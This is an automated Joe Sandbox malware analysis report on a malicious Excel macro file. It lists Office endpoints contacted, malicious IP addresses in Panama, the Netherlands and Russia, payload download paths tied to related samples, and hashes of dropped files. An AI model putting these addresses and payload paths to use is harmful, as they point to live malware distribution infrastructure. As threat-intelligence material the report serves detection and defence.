https://prod-global-autodetect.acompli.net/autodetect	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office365.com/autodiscover/autodiscover.json	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://ncus.contentsync.	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
http://weather.service.msn.com/data.aspx	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://apis.live.net/v5.0/	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://management.azure.com	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://wus2.contentsync.	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://incidents.diagnostics.office.com	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://clients.config.office.net/user/v1.0/ios	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://insertmedia.bing.office.net/odc/insertmedia	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://api.office.net	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://incidents.diagnosticssdf.office.com	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://asgsmsproxyapi.azurewebsites.net/	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://entitlement.diagnostics.office.com	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://substrate.office.com/search/api/v2/init	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://outlook.office.com/	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://templatelogging.office.com/client/log	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://outlook.office365.com/	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://webshell.suite.office.com	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://management.azure.com/	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://login.windows.net/common/oauth2/authorize	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://graph.windows.net/	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://api.powerbi.com/beta/myorg/imports	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://devnull.onenote.com	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://ncus.pagecontentsync.	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://messaging.office.com/	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://augloop.office.com/v2	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://skyapi.live.net/Activity/	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/mac	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://dataservice.o365filtering.com	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.cortana.ai	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://ovisualuiapp.azurewebsites.net/pbiagave/	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false	Avira URL Cloud: safe	unknown
https://visio.uservoice.com/forums/368202-visio-on-devices	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high
https://directory.services.	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://login.windows-ppe.net/common/oauth2/authorize	98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8.0.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
190.14.37.3	unknown	Panama	52469	OffshoreRacksSAPA	false
185.183.99.120	unknown	Netherlands	60117	HSAE	false
185.240.103.219	unknown	Russian Federation	57724	DDOS-GUARDRU	false

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	440654
Start date:	25.06.2021
Start time:	18:49:41
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 5m 17s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Permission-40776837-06252021.xlsm
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	34
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal64.expl.evad.winXLSM@7/8@0/3
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsm Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 13.64.90.137, 23.211.6.115, 52.147.198.201, 52.109.76.68, 52.109.88.37, 52.109.12.21, 20.82.209.183, 23.211.4.86, 40.112.88.60, 20.54.104.15, 173.222.108.210, 173.222.108.226, 80.67.82.211, 80.67.82.235, 20.82.210.154 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, skypedataprdcolwus17.cloudapp.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, fs.microsoft.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
190.14.37.3	Permission-1984690372-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3/44372.7746763889.dat
	Permission-1532161794-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3/44372.7722377315.dat
	Permission-1984690372-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3/44372.7698814815.dat
	Permission-1532161794-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3/44372.7671056713.dat
	Permission-414467145-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3/44372.593127662.dat
	Permission-414467145-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3/44372.5879460648.dat
185.183.99.120	Permission-40776837-06252021.xlsm	Get hash	malicious	Browse	185.183.99.120/44372.7795725694.dat
	Permission-1984690372-06252021.xlsm	Get hash	malicious	Browse	185.183.99.120/44372.7746763889.dat
	Permission-1532161794-06252021.xlsm	Get hash	malicious	Browse	185.183.99.120/44372.7722377315.dat
	Permission-1984690372-06252021.xlsm	Get hash	malicious	Browse	185.183.99.120/44372.7698814815.dat
	Permission-1532161794-06252021.xlsm	Get hash	malicious	Browse	185.183.99.120/44372.7671056713.dat
	Permission-414467145-06252021.xlsm	Get hash	malicious	Browse	185.183.99.120/44372.593127662.dat
	Permission-414467145-06252021.xlsm	Get hash	malicious	Browse	185.183.99.120/44372.5879460648.dat
185.240.103.219	Permission-414467145-06252021.xlsm	Get hash	malicious	Browse	185.240.103.219/44372.593127662.dat
185.240.103.219	Permission-414467145-06252021.xlsm	Get hash	malicious	Browse	185.240.103.219/44372.5879460648.dat

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
DDOS-GUARDRU	Permission-40776837-06252021.xlsm	Get hash	malicious	Browse	185.240.103.219
	Permission-1984690372-06252021.xlsm	Get hash	malicious	Browse	185.240.103.219
	Permission-1532161794-06252021.xlsm	Get hash	malicious	Browse	185.240.103.219
	Permission-1984690372-06252021.xlsm	Get hash	malicious	Browse	185.240.103.219
	Permission-1532161794-06252021.xlsm	Get hash	malicious	Browse	185.240.103.219
	Permission-414467145-06252021.xlsm	Get hash	malicious	Browse	185.240.103.219
	Permission-414467145-06252021.xlsm	Get hash	malicious	Browse	185.240.103.219
	Decline-172917164-06242021.xlsm	Get hash	malicious	Browse	5.253.62.174
	Decline-172917164-06242021.xlsm	Get hash	malicious	Browse	5.253.62.174
	ForceNitro.exe	Get hash	malicious	Browse	185.178.208.135
	PO#8076.exe	Get hash	malicious	Browse	185.129.100.112
	Cancellation_Letter_2137859823_06112021.xlsm	Get hash	malicious	Browse	185.240.103.162
	Cancellation_Letter_2137859823_06112021.xlsm	Get hash	malicious	Browse	185.240.103.162
	jebDtHCePK9feGL.exe	Get hash	malicious	Browse	185.129.100.112
	EDS03932,pdf.exe	Get hash	malicious	Browse	185.178.208.160
	PO_29_00412.exe	Get hash	malicious	Browse	185.178.208.160
	PO_29_00412.exe	Get hash	malicious	Browse	185.178.208.160
	12042021493876783,xlsx.exe	Get hash	malicious	Browse	185.178.208.160
	Ref. PDF IGAPO17493.exe	Get hash	malicious	Browse	5.253.61.31
	AxR7BY4wzz.exe	Get hash	malicious	Browse	185.178.208.189
OffshoreRacksSAPA	Permission-40776837-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3
	Permission-1984690372-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3
	Permission-1532161794-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3
	Permission-1984690372-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3
	Permission-1532161794-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3
	Permission-414467145-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3
	Permission-414467145-06252021.xlsm	Get hash	malicious	Browse	190.14.37.3
	4cDyOofgzT.xlsm	Get hash	malicious	Browse	190.14.37.2
	4cDyOofgzT.xlsm	Get hash	malicious	Browse	190.14.37.2
	341288734918_06172021.xlsm	Get hash	malicious	Browse	190.14.37.2
	341288734918_06172021.xlsm	Get hash	malicious	Browse	190.14.37.2
	Rebate_247668103_06142021.xlsm	Get hash	malicious	Browse	190.14.37.135
	Rebate_247668103_06142021.xlsm	Get hash	malicious	Browse	190.14.37.135
	Rebate_1963763550_06142021.xlsm	Get hash	malicious	Browse	190.14.37.135
	Rebate_1963763550_06142021.xlsm	Get hash	malicious	Browse	190.14.37.135
	Rebate_234359500_06142021.xlsm	Get hash	malicious	Browse	190.14.37.135
	Rebate_234359500_06142021.xlsm	Get hash	malicious	Browse	190.14.37.135
	banUwVSwBY.xlsx	Get hash	malicious	Browse	190.14.37.134
	banUwVSwBY.xlsx	Get hash	malicious	Browse	190.14.37.134
	Rebate_18082425_05272021.xlsm	Get hash	malicious	Browse	190.14.37.102
HSAE	Permission-40776837-06252021.xlsm	Get hash	malicious	Browse	185.183.99.120
	Permission-1984690372-06252021.xlsm	Get hash	malicious	Browse	185.183.99.120
	Permission-1532161794-06252021.xlsm	Get hash	malicious	Browse	185.183.99.120
	Permission-1984690372-06252021.xlsm	Get hash	malicious	Browse	185.183.99.120
	Permission-1532161794-06252021.xlsm	Get hash	malicious	Browse	185.183.99.120
	Permission-414467145-06252021.xlsm	Get hash	malicious	Browse	185.183.99.120
	Permission-414467145-06252021.xlsm	Get hash	malicious	Browse	185.183.99.120
	Decline-172917164-06242021.xlsm	Get hash	malicious	Browse	185.117.73.74
	Decline-172917164-06242021.xlsm	Get hash	malicious	Browse	185.117.73.74
	xa6FEoUw0W.dll	Get hash	malicious	Browse	188.116.36.211
	tszs3mwUbe.exe	Get hash	malicious	Browse	185.45.193.29
	pZ50mMKSLi.exe	Get hash	malicious	Browse	185.45.193.29
	qTnwCotzR9.exe	Get hash	malicious	Browse	185.45.193.29
	PwBsqWQ7jJ.exe	Get hash	malicious	Browse	185.45.193.29
	aGDehjYIws.exe	Get hash	malicious	Browse	185.198.57.204
	Tjhsm8p85Y.exe	Get hash	malicious	Browse	185.45.193.29
	T23HJFoN2Y.exe	Get hash	malicious	Browse	185.45.193.29
	i7NsO9mhTD.exe	Get hash	malicious	Browse	185.45.193.29
	o7w2HSi17V.exe	Get hash	malicious	Browse	185.141.27.225
	AB1CEF822F66D7B77574A21C8154D4A6E9FCD196A6659.exe	Get hash	malicious	Browse	185.198.57.204

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\98DB5CB7-5E0F-4C7C-9ECA-A8B613A341F8 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	135189
Entropy (8bit):	5.363294803170752
Encrypted:	false
SSDEEP:	1536:zcQIKNgeBTA3gBwlpQ9DQW+z7Y34ZliKWXboOidX5E6LWME9:vEQ9DQW+zvXO1
MD5:	0F6EAACABE50A5A4848AD36539FAE0FD
SHA1:	37FCD9388B46C75A49114BE5A7F363BC5E9E303D
SHA-256:	F9E28234FDB4082DD0AF71957D4262F70EE1F59290E8224516EC4F8EC0B030C8
SHA-512:	84BC292208FBDBB8A3016A46E0FE637963A1E9426EB7BBCADE6DCD35C3A6F4BB2A817F3367E3FED2455A9D9F32C0F274C987F9A5411EDBBF308B19F7ADD228F8
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2021-06-25T16:50:32">.. Build: 16.0.14223.30528-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\7B377E74.jpg Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	[TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS6 (Windows), datetime=2021:02:11 21:11:18], baseline, precision 8, 1860x1000, frames 3
Category:	dropped
Size (bytes):	139381
Entropy (8bit):	7.677272725029824
Encrypted:	false
SSDEEP:	3072:CmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZOy:54P4346PgZw9gQat
MD5:	53918FB868F1540920FC189C6783FC7C
SHA1:	135CB103C5B5125C80285A83AE728B559313BADC
SHA-256:	7F6AD5212338A6586251AEF92D2543AA8E70C815FE0BF7ADDCE2C0A83D20A0B3
SHA-512:	31391EFC3D377EA32A537EF3DDCA41ABAF34C4C83CDFEF9A64D40DE219B88A293BE2BF01D6A5D2B23365513CB880020F37CA8E90506C41FB7FC8E42D4D641F51
Malicious:	false
Reputation:	low
Preview:	....!jExif..MM.*.............................b...........j.(...........1.........r.2...........i...............-....'..-....'.Adobe Photoshop CS6 (Windows).2021:02:11 21:11:18..........................D.......................................................&.(................................ 4.......H.......H.........XICC_PROFILE......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch....

C:\Users\user\AppData\Local\Temp\16810000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	153181
Entropy (8bit):	7.664774686846978
Encrypted:	false
SSDEEP:	3072:ZmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZOg:o4P4346PgZw9gQaT
MD5:	D925A29A54F9F029EB0EE51F80548286
SHA1:	0A397032E717FE62775DED92D8EA84E6A8799E9F
SHA-256:	27BA6F8732F38FE8EB463F9B97F838E5E816250A352BAD986B5C9423BB928D4E
SHA-512:	BCD606F2AD59B63396CB75870D2167E6F895357360FD64DABD2051AFC868C3CCF359490F696BB639A0980A1D9481004ABB0A7193BE96042442C20021EF4074D0
Malicious:	false
Reputation:	low
Preview:	..Mn.0....z...B..EP...H.e. ....Xb.?.Lb.C.Q...,..X..y.Gi8.Y.].a...]T.V..N.....g...1......1..../...XP..5kS..G..X9..V...H.34.XB..r2....6.)k......U..nE.o..e.....x...DF.... .[,.@..!... c....\|PD....5.......8..*;c.U>~............S.29...MF....%.x..~....J.w..s..anN...W.u.EV....Y.k.5P......2..rq.......N:.....F...T..\...hL..6.c(.#.D.5.....d..i.1......[.(...........!..g.\|....B.\.Z...9.^.....Cp>...p...i..KOB...~...]=.N..;.\|\|I.;.;.g........PK..........!...&n....o.......[Content_Types].xml ...(........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Thu Jun 27 16:19:49 2019, mtime=Sat Jun 26 00:50:35 2021, atime=Sat Jun 26 00:50:35 2021, length=8192, window=hide
Category:	dropped
Size (bytes):	904
Entropy (8bit):	4.635179118071064
Encrypted:	false
SSDEEP:	12:8HEFXUyNuElPCH2Axjd3YYLy+WrjAZ/2bDDLC5Lu4t2Y+xIBjKZm:8HEjw52AZiDq87aB6m
MD5:	5A542CF153A4F208DD1A27786ADD2D0F
SHA1:	9C808F3AC08BC4B8BA9903329B4F97FB54A59638
SHA-256:	42610F84BABA355F57E5EF6137D9B0303771FC1DC972270C82D227A304C769ED
SHA-512:	97ECA180D072663F19D2150D4832054ED36745BAF8383A4200EEE201069C14CD14187824096FA625F5E62DCE446AB3347973F0FE6691C022BA7A21F9AB8A8B62
Malicious:	false
Reputation:	low
Preview:	L..................F........N....-.....-j.....-j... ......................u....P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...RH.....................:.....q\|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny..RH......S....................i.i.h.a.r.d.z.....~.1......RR...Desktop.h.......Ny..RR......Y..............>.....@...D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......E...............-.......D...........>.S......C:\Users\user\Desktop........\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...As...`.......X.......302494...........!a..%.H.VZAj...4.4...........-..!a..%.H.VZAj...4.4...........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1SPS..mD..pH.H@..=x.....h....H......K*..@.A..7sFJ............

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Permission-40776837-06252021.xlsm.LNK Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Sep 30 14:03:43 2020, mtime=Sat Jun 26 00:50:35 2021, atime=Sat Jun 26 00:50:35 2021, length=153172, window=hide
Category:	dropped
Size (bytes):	2300
Entropy (8bit):	4.690045153309288
Encrypted:	false
SSDEEP:	48:8wEn967R3L9632B6pwEn967R3L9632B6:8NYs2KNYs2
MD5:	F90C29B7CE79EAA5633E4CF70A8FF168
SHA1:	FFB1525783BD74AB1AFE2306A5A25901913E28A0
SHA-256:	C2C659D42294473A144149EFB2E3534AB2A54718EA9DA9DFA71D244366D31E72
SHA-512:	982E66FD4415175CDDBC3D8CA03CDCD61C54B245D5074CE6F2FDD68DB50D377CFA31B0BAB28DAEB902E85FD93C6E4841490FE8631E1C3489AF5411DB348296BA
Malicious:	true
Reputation:	low
Preview:	L..................F.... ...Z[..:...3..-j...N.-j..TV...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...RH.....................:.....q\|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....>Qwx..user.<.......Ny..RH......S....................i.i.h.a.r.d.z.....~.1.....>Qxx..Desktop.h.......Ny..RH......Y..............>.......U.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2..X...RM. .PERMIS~1.XLS..t......>Qvx.RM.....h......................\B.P.e.r.m.i.s.s.i.o.n.-.4.0.7.7.6.8.3.7.-.0.6.2.5.2.0.2.1...x.l.s.m.......g...............-.......f...........>.S......C:\Users\user\Desktop\Permission-40776837-06252021.xlsm..8.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.P.e.r.m.i.s.s.i.o.n.-.4.0.7.7.6.8.3.7.-.0.6.2.5.2.0.2.1...x.l.s.m.........:..,.LB.)...As...`.......X.......302494...........!a..%.H.VZAj......-.........-..!a..%.H.VZAj......-.........-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	154
Entropy (8bit):	4.802998385735191
Encrypted:	false
SSDEEP:	3:oyBVomxW+LxtTUSOX9rpStLxtTUSOX9rpSmxW+LxtTUSOX9rpSv:djHxOdpEFxOdpJxOdpc
MD5:	2877FE79BD75DE1064CDA22221B5D82A
SHA1:	4E36822B3AF2ED15AEE01E001AB418E44972992A
SHA-256:	9E3FF45D5278D40B927316486E0662F038DF0B0DDA7CC45AB1D70D53687DC25A
SHA-512:	26084486668D924BBD4961BC51B8C7DFC903700BC2F5FFF645514BD0A1834639A17D25065F8E78632B3B14CBE46729F7889A57467A3B4231EC7253E07C8F81E2
Malicious:	false
Reputation:	low
Preview:	Desktop.LNK=0..[misc]..Permission-40776837-06252021.xlsm.LNK=0..Permission-40776837-06252021.xlsm.LNK=0..[misc]..Permission-40776837-06252021.xlsm.LNK=0..

C:\Users\user\Desktop\A6810000 Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	153172
Entropy (8bit):	7.664763799679478
Encrypted:	false
SSDEEP:	3072:XmKZQmKZ3KNhPQnVbJ2O1gZMys2g4D5JhoD4ZO7:24P4346PgZw9gQaA
MD5:	5F54D35FF8B3B7C0279821C4357F5D13
SHA1:	B7C82C233607FA59CE32139A1544BAC1521571A8
SHA-256:	96BC46BC3F626227704066F04E772730D4F160FCAC102F0D3919241F10CC35DB
SHA-512:	1FF50BFA57F1076E50A18AF23C78AEBCA029C0AE8EB4A548AB178074A732234AA25F9EECB6D12ED71F1FC61530B130C1E75D3B574C7507AC40B028E08A28695E
Malicious:	false
Reputation:	low
